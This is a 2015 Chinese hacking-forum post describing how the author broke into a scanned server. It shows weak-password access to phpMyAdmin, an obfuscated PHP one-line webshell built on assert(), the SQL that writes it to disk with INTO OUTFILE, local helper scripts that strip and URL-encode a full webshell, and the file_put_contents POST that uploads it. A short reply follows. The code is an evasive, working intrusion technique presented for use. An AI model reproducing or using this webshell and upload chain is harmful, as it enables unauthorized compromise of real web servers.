查看: 9694|回复: 1

木马GetShell的另类姿势

[复制链接]
  • TA的每日心情

    2024-10-23 14:35
  • 签到天数: 917 天

    [LV.10]以坛为家III

    发表于 2015-9-24 17:44:47 | 显示全部楼层 |阅读模式
    0×00 工欲善其事,必先利其器

    其实吧,之前是想写一长篇小说的,把整个过程详细的写一遍,怕各位看官拍砖,转了话风 ……

    中间件:
    XAMPP(能运行PHP程序即可)
    ‍‍武器:
    Chrome浏览器、Proxy SwitchySharp代理插件、Advanced REST client插件(核武器)
    ‍‍函数:
    file_put_contents()、urlencode()、urldecode()、php_strip_whitespace() -- PHP函数
    0×01 上小马

    扫C段时发现一机器有phpMyAdmin服务,就尝试了一下弱口令,root123果断进入,然后就开始了下面的故事。

    探测IP为阿里云服务器,普通的一句话木马一写入就被杀掉,后改为混淆一句话木马:

    [PHP] 纯文本查看 复制代码
    <?php                
    @$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r';                  
    @$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t';                  
    @$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'}                  
    [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
    //密码-7  
    ?>

    一句话木马原形:

    [PHP] 纯文本查看 复制代码
    assert($_POST[-7]);

    写入一句话木马SQL(网站路径从phpinfo.php获得,其它姿势亦可):
    [PHP] 纯文本查看 复制代码
    use test;
    drop table if exists temp;
    create table temp (cmd text NOT NULL);
    insert into temp (cmd) values("<?php @$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r'; @$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t'; @$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'} [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?> ");
    select cmd from temp into outfile 'D:/phpStudy/WWW/phpMyAdmin/indxe.php';
    drop table if exists temp;

    14425716922503.jpg
    0×02 处理大马
    14425719057526.jpg
    用菜刀连接一句话木马,连接上后即提示"连接被重置",估计是屏蔽了本机的出口IP,用VPN、切换代理后同样的问题还是会即时出现,所以放弃用菜刀上传webshell,尝试手工post的方法。

    这里需要先确定下服务器上file_put_contents()函数是否执行,可行的话再执行下面的操作。

    首先在本地把大马处理好以便于作为post参数:

    用到了strip_whitespace()函数【返回已删除PHP注释以及空白字符的源代码文件】,urlencode()函数【对字符串进行url编码处理】,file_get_contents()函数【读取txt文件内容】。

    C盘根目录下需要放一个strip_shell.php文件(待strip_whitespace的php大马),新建strip.php文件和urlencode.php文件,两文件内容分别为(注意两个函数参数):
    [PHP] 纯文本查看 复制代码
    strip.php:
    <?php
    echo php_strip_whitespace('strip_shell.php');
    ?>
    urlencode.php:
    <?php
    echo urlencode(file_get_contents('urlencode_shell.php'));
    ?>

    执行过程如下(注意文件名称变化和执行顺序):
    14425762567283.jpg
    所有文件如下:


    14425763688880.jpg
    其中urldecode.php文件为最终处理的文件,文件内容如下:
    1442576421421.jpg
    0×03 GetShell

    最后请出主角Advanced REST client插件,长这样:
    14425769527225.jpg
    这里只需用到POST方法,上面一句话小马的密码为-7,即这里Payload模块的key为-7,参数重要部分如下:

    [PHP] 纯文本查看 复制代码
    file_put_contents("D:/phpStudy/WWW/phpMyAdmin/mysqlx.php",urldecode("复制urldecode.php文件所有内容"));

    最后POST表单如下:
    14425773169250.jpg
    至此,成功GetShell,有错误或好的建议请指正提出。
    回复

    使用道具 举报

  • TA的每日心情
    难过
    2015-11-28 20:26
  • 签到天数: 32 天

    [LV.5]常住居民I

    发表于 2015-9-24 20:54:07 | 显示全部楼层
    我平常习惯用火狐浏览器hackbar
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-1 23:38 , Processed in 0.026567 second(s), 13 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部